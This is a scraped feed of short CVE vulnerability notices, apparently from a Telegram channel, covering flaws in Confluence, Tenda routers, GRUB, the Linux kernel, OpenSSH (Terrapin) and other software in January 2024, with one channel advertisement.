🚨 CVE-2023-52116Permission management vulnerability in the multi-screen interaction module. Successful exploitation of this vulnerability may cause service exceptions of the device.🎖@cveNotify |
|
| 2024-01-16 09:37:25 |
🚨 CVE-2023-52108Vulnerability of process priorities being raised in the ActivityManagerService module. Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-01-16 09:37:24 |
🚨 CVE-2023-52098Denial of Service (DoS) vulnerability in the DMS module. Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-01-16 06:31:30 |
Do you enjoy reading this channel?Perhaps you have thought about placing ads on it?To do this, follow three simple steps:1) Sign up: https://telega.io/c/cveNotify2) Top up the balance in a convenient way3) Create an advertising postIf the topic of your post fits our channel, we will publish it with pleasure. |
|
| 2024-01-16 05:37:26 |
🚨 CVE-2024-21674This High severity Remote Code Execution (RCE) vulnerability was introduced in version 7.13.0 of Confluence Data Center and Server.Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.6 and a CVSS Vector of CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N allows an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, no impact to integrity, no impact to availability, and does not require user interaction.Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:* Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release* Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release* Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher releaseSee the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ).🎖@cveNotify |
|
| 2024-01-16 05:37:25 |
🚨 CVE-2023-22527Summary of VulnerabilityA template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.See “What You Need to Do” for detailed instructions. {panel:bgColor=#deebff}Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.{panel}Affected Versions||Product||Affected Versions|||Confluence Data Center and Server| 8.0.x 8.1.x 8.2.x 8.3.x 8.4.x 8.5.0 8.5.1 8.5.2 8.5.3|Fixed Versions||Product||Fixed Versions|||Confluence Data Center and Server|8.5.4 (LTS)||Confluence Data Center| 8.6.0 or later (Data Center Only) 8.7.1 or later (Data Center Only)|What You Need To DoImmediately patch to a fixed versionAtlassian recommends that you patch each of your affected installations to the latest version. The listed Fixed Versions are no longer the most up-to-date versions and do not protect your instance from other non-critical vulnerabilities as outlined in Atlassian’s January Security Bulletin.||Product||Fixed Versions||Latest Versions|||Confluence Data Center and Server| 8.5.4 (LTS)| 8.5.5 (LTS)|Confluence Data Center| 8.6.0 or later (Data Center Only) 8.7.1 or later (Data Center Only)| 8.6.3 or later (Data Center Only) 8.7.2 or later (Data Center Only)For additional details, please see full advisory.🎖@cveNotify |
|
| 2024-01-16 05:37:24 |
🚨 CVE-2023-22526This High severity RCE (Remote Code Execution) vulnerability was introduced in version 7.19.0 of Confluence Data Center.This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction.Atlassian recommends that Confluence Data Center customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Confluence Data Center and Server 7.19: Upgrade to a release 7.19.17, or any higher 7.19.x release Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher releaseSee the release notes ([https://confluence.atlassian.com/doc/confluence-release-notes-327.html]). You can download the latest version of Confluence Data Center from the download center ([https://www.atlassian.com/software/confluence/download-archives]).This vulnerability was discovered by m1sn0w and reported via our Bug Bounty program🎖@cveNotify |
|
| 2024-01-16 04:37:25 |
🚨 CVE-2024-22362Drupal contains a vulnerability with improper handling of structural elements. If this vulnerability is exploited, an attacker may be able to cause a denial-of-service (DoS) condition.🎖@cveNotify |
|
| 2024-01-16 04:37:24 |
🚨 CVE-2022-34364Dell BSAFE SSL-J, versions before 6.5 and version 7.0 contain a debug message revealing unnecessary information vulnerability. This may lead to disclosing sensitive information to a locally privileged user.🎖@cveNotify |
|
| 2024-01-16 02:37:32 |
🚨 CVE-2023-51059An issue in MOKO TECHNOLOGY LTD MOKOSmart MKGW1 BLE Gateway v.1.1.1 and before allows a remote attacker to escalate privileges via the session management component of the administrative web interface.🎖@cveNotify |
|
| 2024-01-16 02:37:26 |
🚨 CVE-2023-43449An issue in HummerRisk HummerRisk v.1.10 thru 1.4.1 allows an authenticated attacker to execute arbitrary code via a crafted request to the service/LicenseService component.🎖@cveNotify |
|
| 2024-01-16 02:37:25 |
🚨 CVE-2023-26941Weak encryption mechanisms in RFID Tags in Yale Conexis L1 v1.1.0 allows attackers to create a cloned tag via physical proximity to the original.🎖@cveNotify |
|
| 2024-01-16 02:37:24 |
🚨 CVE-2022-46480Incorrect Session Management and Credential Re-use in the Bluetooth LE stack of the Ultraloq UL3 2nd Gen Smart Lock Firmware 02.27.0012 allows an attacker to sniff the unlock code and unlock the device whilst within Bluetooth range.🎖@cveNotify |
|
| 2024-01-16 01:37:36 |
🚨 CVE-2023-51810SQL injection vulnerability in StackIdeas EasyDiscuss v.5.0.5 and fixed in v.5.0.10 allows a remote attacker to obtain sensitive information via a crafted request to the search parameter in the Users module.🎖@cveNotify |
|
| 2024-01-16 01:37:35 |
🚨 CVE-2023-49106Missing Password Field Masking vulnerability in Hitachi Device Manager on Windows, Linux (Device Manager Agent component).This issue affects Hitachi Device Manager: before 8.8.5-04.🎖@cveNotify |
|
| 2024-01-16 01:37:31 |
🚨 CVE-2023-47460SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component.🎖@cveNotify |
|
| 2024-01-16 01:37:30 |
🚨 CVE-2023-4001An authentication bypass flaw was found in GRUB due to the way that GRUB uses the UUID of a device to search for the configuration file that contains the password hash for the GRUB password protection feature. An attacker capable of attaching an external drive such as a USB stick containing a file system with a duplicate UUID (the same as in the "/boot/" file system) can bypass the GRUB password protection feature on UEFI systems, which enumerate removable drives before non-removable ones. This issue was introduced in a downstream patch in Red Hat's version of grub2 and does not affect the upstream package.🎖@cveNotify |
|
| 2024-01-16 01:37:25 |
🚨 CVE-2013-4577A certain Debian patch for GNU GRUB uses world-readable permissions for grub.cfg, which allows local users to obtain password hashes, as demonstrated by reading the password_pbkdf2 directive in the file.🎖@cveNotify |
|
| 2024-01-16 01:37:24 |
🚨 CVE-2009-4128GNU GRand Unified Bootloader (GRUB) 2 1.97 only compares the submitted portion of a password with the actual password, which makes it easier for physically proximate attackers to conduct brute force attacks and bypass authentication by submitting a password whose length is 1.🎖@cveNotify |
|
| 2024-01-15 23:37:24 |
🚨 CVE-2023-7206In Horner Automation Cscape versions 9.90 SP10 and prior, local attackers are able to exploit this vulnerability if a user opens a malicious CSP file, which would result in execution of arbitrary code on affected installations of Cscape.🎖@cveNotify |
|
| 2024-01-15 21:37:25 |
🚨 CVE-2023-5455A Cross-site request forgery vulnerability exists in ipa/session/login_password in all supported versions of IPA. This flaw allows an attacker to trick the user into submitting a request that could perform actions as the user, resulting in a loss of confidentiality and system integrity. During community penetration testing it was found that for certain HTTP end-points FreeIPA does not ensure CSRF protection. Due to implementation details one cannot use this flaw for reflection of a cookie representing already logged-in user. An attacker would always have to go through a new authentication attempt.🎖@cveNotify |
|
| 2024-01-15 21:37:24 |
🚨 CVE-2023-5012A vulnerability, which was classified as problematic, was found in Topaz OFD 2.11.0.201. This affects an unknown part of the file C:\Program Files\Topaz OFD\Warsaw\core.exe of the component Protection Module Warsaw. The manipulation leads to unquoted search path. Attacking locally is a requirement. Upgrading to version 2.12.0.259 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-239853 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-15 20:37:24 |
🚨 CVE-2024-0565An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.🎖@cveNotify |
|
| 2024-01-15 19:37:24 |
🚨 CVE-2024-0562A use-after-free flaw was found in the Linux Kernel. When a disk is removed, bdi_unregister is called to stop further write-back and waits for associated delayed work to complete. However, wb_inode_writeback_end() may schedule bandwidth estimation work after this has completed, which can result in the timer attempting to access the recently freed bdi_writeback.🎖@cveNotify |
|
| 2024-01-15 15:37:31 |
🚨 CVE-2023-46226Remote Code Execution vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 1.0.0 through 1.2.2.Users are recommended to upgrade to version 1.3.0, which fixes the issue.🎖@cveNotify |
|
| 2024-01-15 15:37:30 |
🚨 CVE-2024-0510A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function http_post of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250652.🎖@cveNotify |
|
| 2024-01-15 15:37:26 |
🚨 CVE-2024-0252ManageEngine ADSelfService Plus versions 6401 and below are vulnerable to the remote code execution due to the improper handling in the load balancer component. Authentication is required in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-15 15:37:25 |
🚨 CVE-2023-5347An Improper Verification of Cryptographic Signature vulnerability in the update process of Korenix JetNet Series allows replacing the whole operating system including Trusted Executables. This issue affects JetNet devices older than firmware version 2024/01.🎖@cveNotify |
|
| 2024-01-15 15:37:24 |
🚨 CVE-2022-1768The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to insufficient escaping and parameterization on user supplied data passed to multiple SQL queries in the ~/rsvpmaker-email.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to, and including, 9.3.2. Please note that this is separate from CVE-2022-1453 & CVE-2022-1505.🎖@cveNotify |
|
| 2024-01-15 14:37:31 |
🚨 CVE-2023-42137PAX Android based POS devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow for command execution with high privileges by using malicious symlinks.The attacker must have shell access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-15 14:37:30 |
🚨 CVE-2023-42135PAX A920Pro/A50 devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow local code execution via parameter injection by bypassing the input validation when flashing a specific partition. The attacker must have physical USB access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-15 14:37:26 |
🚨 CVE-2024-0252ManageEngine ADSelfService Plus versions 6401 and below are vulnerable to the remote code execution due to the improper handling in the load balancer component. Authentication is required in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-15 14:37:25 |
🚨 CVE-2021-36978QPDF 9.x through 9.1.1 and 10.x through 10.0.4 has a heap-based buffer overflow in Pl_ASCII85Decoder::write (called from Pl_AES_PDF::flush and Pl_AES_PDF::finish) when a certain downstream write fails.🎖@cveNotify |
|
| 2024-01-15 14:37:24 |
🚨 CVE-2020-15999Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-01-15 13:37:24 |
🚨 CVE-2024-20709Acrobat Reader T5 (MSFT Edge) versions 120.0.2210.91 and earlier are affected by an Improper Input Validation vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-01-15 12:37:25 |
🚨 CVE-2023-4001An authentication bypass flaw was found in GRUB due to the way that GRUB uses the UUID of a device to search for the configuration file that contains the password hash for the GRUB password protection feature. An attacker capable of attaching an external drive such as a USB stick containing a file system with a duplicate UUID (the same as in the "/boot/" file system) can bypass the GRUB password protection feature on UEFI systems, which enumerate removable drives before non-removable ones. This issue was introduced in a downstream patch in Red Hat's version of grub2 and does not affect the upstream package.🎖@cveNotify |
|
| 2024-01-15 12:37:24 |
🚨 CVE-2023-6129Issue summary: The POLY1305 MAC (message authentication code) implementationcontains a bug that might corrupt the internal state of applications runningon PowerPC CPU based platforms if the CPU provides vector instructions.Impact summary: If an attacker can influence whether the POLY1305 MACalgorithm is used, the application state might be corrupted with variousapplication dependent consequences.The POLY1305 MAC (message authentication code) implementation in OpenSSL forPowerPC CPUs restores the contents of vector registers in a different orderthan they are saved. Thus the contents of some of these vector registersare corrupted when returning to the caller. The vulnerable code is used onlyon newer PowerPC processors supporting the PowerISA 2.07 instructions.The consequences of this kind of internal application state corruption canbe various - from no consequences, if the calling application does notdepend on the contents of non-volatile XMM registers at all, to the worstconsequences, where the attacker could get complete control of the applicationprocess. However unless the compiler uses the vector registers for storingpointers, the most likely consequence, if any, would be an incorrect resultof some application dependent calculations or a crash leading to a denial ofservice.The POLY1305 MAC algorithm is most frequently used as part of theCHACHA20-POLY1305 AEAD (authenticated encryption with associated data)algorithm. The most common usage of this AEAD cipher is with TLS protocolversions 1.2 and 1.3. If this cipher is enabled on the server a maliciousclient can influence whether this AEAD cipher is used. This implies thatTLS server applications using OpenSSL can be potentially impacted. Howeverwe are currently not aware of any concrete application that would be affectedby this issue therefore we consider this a Low severity security issue.🎖@cveNotify |
|
| 2024-01-15 11:37:25 |
🚨 CVE-2023-4001An authentication bypass flaw was found in GRUB due to the way that GRUB uses the UUID of a device to search for the configuration file that contains the password hash for the GRUB password protection feature. An attacker capable of attaching an external drive such as a USB stick containing a file system with a duplicate UUID (the same as in the "/boot/" file system) can bypass the GRUB password protection feature on UEFI systems, which enumerate removable drives before non-removable ones. This issue was introduced in a downstream patch in Red Hat's version of grub2 and does not affect the upstream package.🎖@cveNotify |
|
| 2024-01-15 11:37:24 |
🚨 CVE-2023-46226Remote Code Execution vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 1.0.0 through 1.2.2.Users are recommended to upgrade to version 1.3.0, which fixes the issue.🎖@cveNotify |
|
| 2024-01-15 10:37:25 |
🚨 CVE-2023-6915A Null pointer dereference problem was found in ida_free in lib/idr.c in the Linux Kernel. This issue may allow an attacker using this library to cause a denial of service problem due to a missing check at a function return.🎖@cveNotify |
|
| 2024-01-15 10:37:24 |
🚨 CVE-2023-46749Apache Shiro before 1.130 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).🎖@cveNotify |
|
| 2024-01-15 08:37:29 |
🚨 CVE-2023-5376An Improper Authentication vulnerability in Korenix JetNet TFTP allows abuse of this service. This issue affects JetNet devices older than firmware version 2024/01.🎖@cveNotify |
|
| 2024-01-15 08:37:28 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2024-01-15 07:37:26 |
🚨 CVE-2024-22028Insufficient technical documentation issue exists in thermal camera TMC series all firmware versions. The user of the affected product is not aware of the internally saved data. By accessing the affected product physically, an attacker may retrieve the internal data.🎖@cveNotify |
|
| 2024-01-15 07:37:25 |
🚨 CVE-2024-0547A vulnerability has been found in Ability FTP Server 2.34 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component APPE Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250717 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-15 07:37:24 |
🚨 CVE-2020-36770pkg_postinst in the Gentoo ebuild for Slurm through 22.05.3 unnecessarily calls chown to assign root's ownership on files in the live root filesystem. This could be exploited by the slurm user to become the owner of root-owned files.🎖@cveNotify |
|
| 2024-01-15 06:37:25 |
🚨 CVE-2024-0546A vulnerability, which was classified as problematic, has been found in EasyFTP 1.7.0. This issue affects some unknown processing of the component LIST Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250715.🎖@cveNotify |
|
| 2024-01-15 06:37:24 |
🚨 CVE-2024-0543A vulnerability classified as critical has been found in CodeAstro Real Estate Management System up to 1.0. This affects an unknown part of the file propertydetail.php. The manipulation of the argument pid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250713 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-15 05:37:25 |
🚨 CVE-2024-0541A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been declared as critical. Affected by this vulnerability is the function formAddSysLogRule of the component httpd. The manipulation of the argument sysRulenEn leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250711. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-15 05:37:24 |
🚨 CVE-2024-0539A vulnerability was found in Tenda W9 1.0.0.7(4456) and classified as critical. This issue affects the function formQosManage_user of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250709 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-15 04:37:25 |
🚨 CVE-2024-0538A vulnerability has been found in Tenda W9 1.0.0.7(4456) and classified as critical. This vulnerability affects the function formQosManage_auto of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-15 04:37:24 |
🚨 CVE-2024-0536A vulnerability, which was classified as critical, has been found in Tenda W9 1.0.0.7(4456). Affected by this issue is the function setWrlAccessList of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250706 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-15 03:37:25 |
🚨 CVE-2024-0533A vulnerability was found in Tenda A15 15.13.07.13. It has been rated as critical. This issue affects some unknown processing of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250703. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-15 03:37:24 |
🚨 CVE-2023-48383NetVisionInformation airPASS has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.🎖@cveNotify |
|
| 2024-01-15 02:37:25 |
🚨 CVE-2024-0531A vulnerability was found in Tenda A15 15.13.07.13. It has been classified as critical. This affects an unknown part of the file /goform/setBlackRule of the component Web-based Management Interface. The manipulation of the argument deviceList leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250701 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-15 02:37:24 |
🚨 CVE-2024-0529A vulnerability has been found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /apps/login_auth.php of the component HTTP POST Request Handler. The manipulation of the argument username_login leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250699. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-15 01:37:24 |
🚨 CVE-2024-0527A vulnerability, which was classified as critical, has been found in CXBSoft Url-shorting up to 1.3.1. This issue affects some unknown processing of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250697 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-15 00:37:25 |
🚨 CVE-2024-0526A vulnerability classified as critical was found in CXBSoft Url-shorting up to 1.3.1. This vulnerability affects unknown code of the file /pages/short_to_long.php of the component HTTP POST Request Handler. The manipulation of the argument shorturl leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250696. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-15 00:37:24 |
🚨 CVE-2024-0524A vulnerability was found in CXBSoft Url-shorting up to 1.3.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php. The manipulation of the argument url leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250694 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-14 23:37:24 |
🚨 CVE-2024-0522A vulnerability was found in Allegro RomPager 4.01. It has been classified as problematic. Affected is an unknown function of the file usertable.htm?action=delete of the component HTTP POST Request Handler. The manipulation of the argument username leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 4.30 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250692. NOTE: The vendor explains that this is a very old issue that got fixed 20 years ago but without a public disclosure.🎖@cveNotify |
|
| 2024-01-14 23:07:25 |
🚨 CVE-2024-20676Azure Storage Mover Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-01-14 23:07:24 |
🚨 CVE-2024-20666BitLocker Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-01-14 22:37:32 |
🚨 CVE-2024-20690Windows Nearby Sharing Spoofing Vulnerability🎖@cveNotify |
|
| 2024-01-14 22:37:25 |
🚨 CVE-2024-20681Windows Subsystem for Linux Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-01-14 22:37:24 |
🚨 CVE-2024-20674Windows Kerberos Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-01-14 22:07:32 |
🚨 CVE-2024-20699Windows Hyper-V Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-01-14 22:07:26 |
🚨 CVE-2024-20697Windows Libarchive Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-01-14 22:07:25 |
🚨 CVE-2024-20661Microsoft Message Queuing Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-01-14 22:07:24 |
🚨 CVE-2024-20660Microsoft Message Queuing Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-01-14 15:37:24 |
🚨 CVE-2024-0443A flaw was found in the blkgs destruction path in block/blk-cgroup.c in the Linux kernel, leading to a cgroup blkio memory leakage problem. When a cgroup is being destroyed, cgroup_rstat_flush() is only called at css_release_work_fn(), which is called when the blkcg reference count reaches 0. This circular dependency will prevent blkcg and some blkgs from being freed after they are made offline. This issue may allow an attacker with a local access to cause system instability, such as an out of memory error.🎖@cveNotify |
|
| 2024-01-14 10:37:24 |
🚨 CVE-2022-29187Git is a distributed revision control system. Git prior to versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5, is vulnerable to privilege escalation in all platforms. An unsuspecting user could still be affected by the issue reported in CVE-2022-24765, for example when navigating as root into a shared tmp directory that is owned by them, but where an attacker could create a git repository. Versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5 contain a patch for this issue. The simplest way to avoid being affected by the exploit described in the example is to avoid running git as root (or an Administrator in Windows), and if needed to reduce its use to a minimum. While a generic workaround is not possible, a system could be hardened from the exploit described in the example by removing any such repository if it exists already and creating one as root to block any future attacks.🎖@cveNotify |
|
| 2024-01-14 02:37:24 |
🚨 CVE-2023-6277An out-of-memory flaw was found in libtiff. Passing a crafted tiff file to TIFFOpen() API may allow a remote attacker to cause a denial of service via a craft input with size smaller than 379 KB.🎖@cveNotify |
|
| 2024-01-13 22:37:24 |
🚨 CVE-2024-0505A vulnerability was found in ZhongFuCheng3y Austin 1.0 and classified as critical. This issue affects the function getFile of the file com/java3y/austin/web/controller/MaterialController.java of the component Upload Material Menu. The manipulation leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250619.🎖@cveNotify |
|
| 2024-01-13 21:37:24 |
🚨 CVE-2024-0503A vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611.🎖@cveNotify |
|
| 2024-01-13 20:37:25 |
🚨 CVE-2024-0501A vulnerability has been found in SourceCodester House Rental Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Manage Invoice Details. The manipulation of the argument Invoice leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250609 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-13 20:37:24 |
🚨 CVE-2022-4603A vulnerability classified as problematic has been found in ppp. Affected is the function dumpppp of the file pppdump/pppdump.c of the component pppdump. The manipulation of the argument spkt.buf/rpkt.buf leads to improper validation of array index. The real existence of this vulnerability is still doubted at the moment. The name of the patch is a75fb7b198eed50d769c80c36629f38346882cbf. It is recommended to apply a patch to fix this issue. VDB-216198 is the identifier assigned to this vulnerability. NOTE: pppdump is not used in normal process of setting up a PPP connection, is not installed setuid-root, and is not invoked automatically in any scenario.🎖@cveNotify |
|
| 2024-01-13 19:37:25 |
🚨 CVE-2024-0500A vulnerability, which was classified as problematic, was found in SourceCodester House Rental Management System 1.0. Affected is an unknown function of the component Manage Tenant Details. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250608.🎖@cveNotify |
|
| 2024-01-13 19:37:24 |
🚨 CVE-2024-0499A vulnerability, which was classified as problematic, has been found in SourceCodester House Rental Management System 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250607.🎖@cveNotify |
|
| 2024-01-13 18:37:33 |
🚨 CVE-2021-22893Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.🎖@cveNotify |
|
| 2024-01-13 18:37:26 |
🚨 CVE-2019-11510In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .🎖@cveNotify |
|
| 2024-01-13 18:37:25 |
🚨 CVE-2019-11507In Pulse Secure Pulse Connect Secure (PCS) 8.3.x before 8.3R7.1 and 9.0.x before 9.0R3, an XSS issue has been found on the Application Launcher page.🎖@cveNotify |
|
| 2024-01-13 18:37:24 |
🚨 CVE-2019-11538In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1, an NFS problem could allow an authenticated attacker to access the contents of arbitrary files on the affected device.🎖@cveNotify |
|
| 2024-01-13 17:37:24 |
